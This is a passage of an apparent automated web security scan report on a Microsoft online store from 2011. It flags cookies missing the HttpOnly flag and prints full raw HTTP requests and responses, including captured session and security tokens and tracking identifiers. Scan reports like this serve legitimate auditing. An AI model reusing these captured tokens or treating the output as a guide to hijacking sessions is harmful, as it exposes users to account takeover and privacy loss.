_wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:01:52 GMT
Content-Length: 807
Content-Type: image/gif
Expires: Fri, 28 Oct 2011 22:01:52 GMT
Cache-Control: private
Set-Cookie: C5_TRACKING_TOKEN=ed794bbb18b94d4ab7bed7013f542b2d; expires=Sun, 28-Oct-2012 22:01:52 GMT; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:01:52 GMT; path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

3.4. http://www2.buyoffice.microsoft.com/usa/liveperson.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/liveperson.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usa/liveperson.aspx?cache=1968341058&culture=en-us&mainpage=other HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:58 GMT
Content-Length: 4668
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:58 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:58 GMT; path=/
Vary: Accept-Encoding, User-Agent


document.write("<div id='lpChatDiv'></div>");
document.write("<noscript><p>Script section containing code for Liveperson Chat Solution</p></noscript>");
$(document).ready(function() {
var loc
...[SNIP]...

3.5. http://www2.buyoffice.microsoft.com/usa/promotion.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/promotion.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/office-home-and-student-FX101845698.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b476b6d6346654e564530766873524f455753676b665970464852784e70374b6e6e6b725732635731316a412f366a34784c6c2b2f5061705a6d52434153316c39553d; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:54 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:54 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...

3.6. http://www2.buyoffice.microsoft.com/error404redir.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /error404redir.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /error404redir.aspx HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828518287:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE; op390basketpagegum=a0qm1h421k27asr09a3thb27asq0963la5754; op390basketpageliid=a0qm1h421k27asr09a3thb27asq0963la5754; C5_TRACKING_TOKEN=ed794bbb18b94d4ab7bed7013f542b2d

Response

HTTP/1.1 302 Found
Date: Fri, 28 Oct 2011 22:02:33 GMT
Content-Length: 139
Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /usa/error404.aspx
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:02:33 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fusa%2ferror404.aspx">here</a>.</h2>
</body></html>

3.7. http://www2.buyoffice.microsoft.com/usa/error404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/error404.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usa/error404.aspx HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
